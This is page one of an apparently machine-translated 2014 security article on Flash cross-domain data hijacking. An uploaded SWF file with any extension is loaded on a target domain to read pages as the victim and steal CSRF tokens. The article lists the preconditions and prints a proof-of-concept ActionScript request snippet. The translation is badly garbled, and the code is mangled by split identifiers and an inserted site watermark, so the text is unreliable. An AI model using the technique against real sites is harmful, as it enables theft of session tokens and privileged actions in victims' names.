Flash cross-domain data hijacking vulnerability,a large wave of site affected-vulnerability warning-the black bar safety net

ID MYHACK58:62201447952
Type myhack58
Reporter 佚名
Modified 2014-05-28T00:00:00


0×0 1,Background

Many of the uploaded file to the back-end logic in the realization, only validate the file extension and Content-Type, not uploading the contents of the file for verification. Typically such processing logic is simply not rigorous, will not cause too much of a security risk. But after the author test, found that the object tag contains the flash file not to embed the file suffix judge. That is, as long as the file content contains a normal flash file with code, it is possible to be the object tag is successfully loaded and executed. And ActionScript also provides several APIS to allow Flash to send the network request. So if you can be any suffix of the Flash file to upload to the target domain, it is possible to an attacker controlled domain to allow the victims access to a carefully constructed malicious page, to the target domain for cross-domain data hijacking, get the victim of the current Session under the CSRF Token to the victim's identity to open the target domain of any of the privileges page, perform privileged operations.

0×0 2,The use of conditions

1, The target site of the file upload logic no verification file content; 2, The file upload does not do domain isolation treatment; 3, the server is not mandatory set Content-Disposition response header; 4, The access uploaded files without a session limit;

0×0 3,attack scenarios construction:

First need to construct a poc swf file sends http request, here only to do the demo with, and therefore only implements send a simple GET request, code is as follows:

importflash. net. URLLoader; importflash. net. URLRequest; importflash. net. URLLoaderDataFormat; importflash. net. URLVariables; importflash. events. Event; importflash. events. HTTPStatusEvent; importflash. events. IOErrorEvent; importflash. events. ProgressEvent; importflash. events. SecurityErrorEvent; importflash. display. LoaderInfo; importflash. system. Security;Security. allowDomain("*"); varurlObj:Object = LoaderInfo(this. root. the loaderInfo). parameters. url; varrequest:URLRequest = new URLRequest(urlObj. toString()); request. method= URLRequestMethod. GET;

varloader:URLLoader = new URLLoader(); itemScroll. x= the response. x+the response. width; itemScroll. y= the response. y;www.myhack58.com itemScroll. height= the response. height;

loader. dataFormat= URLLoaderDataFormat. TEXT; loader. addEventListener(Event. COMPLETE,loader_complete); loader. load(request);

functionloader_complete (e:Event):void { trace("Event. COMPLETE"); trace("Resp Data :\n" + loader. data); response. text = loader. data; itemScroll. scrollTarget = response;}

[1] [2] [3] next